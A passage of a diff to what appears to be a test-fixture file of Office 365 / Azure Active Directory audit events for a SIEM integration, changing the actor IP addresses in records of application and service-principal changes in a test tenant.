targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -15912,9 +15912,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-"ActorIpAddress": "83.57.233.151",
+"ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
-"ClientIP": "83.57.233.151",
+"ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
@@ -16148,7 +16148,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName
\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\"
:[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16178,9 +16178,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { 
@@ -16398,7 +16398,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n 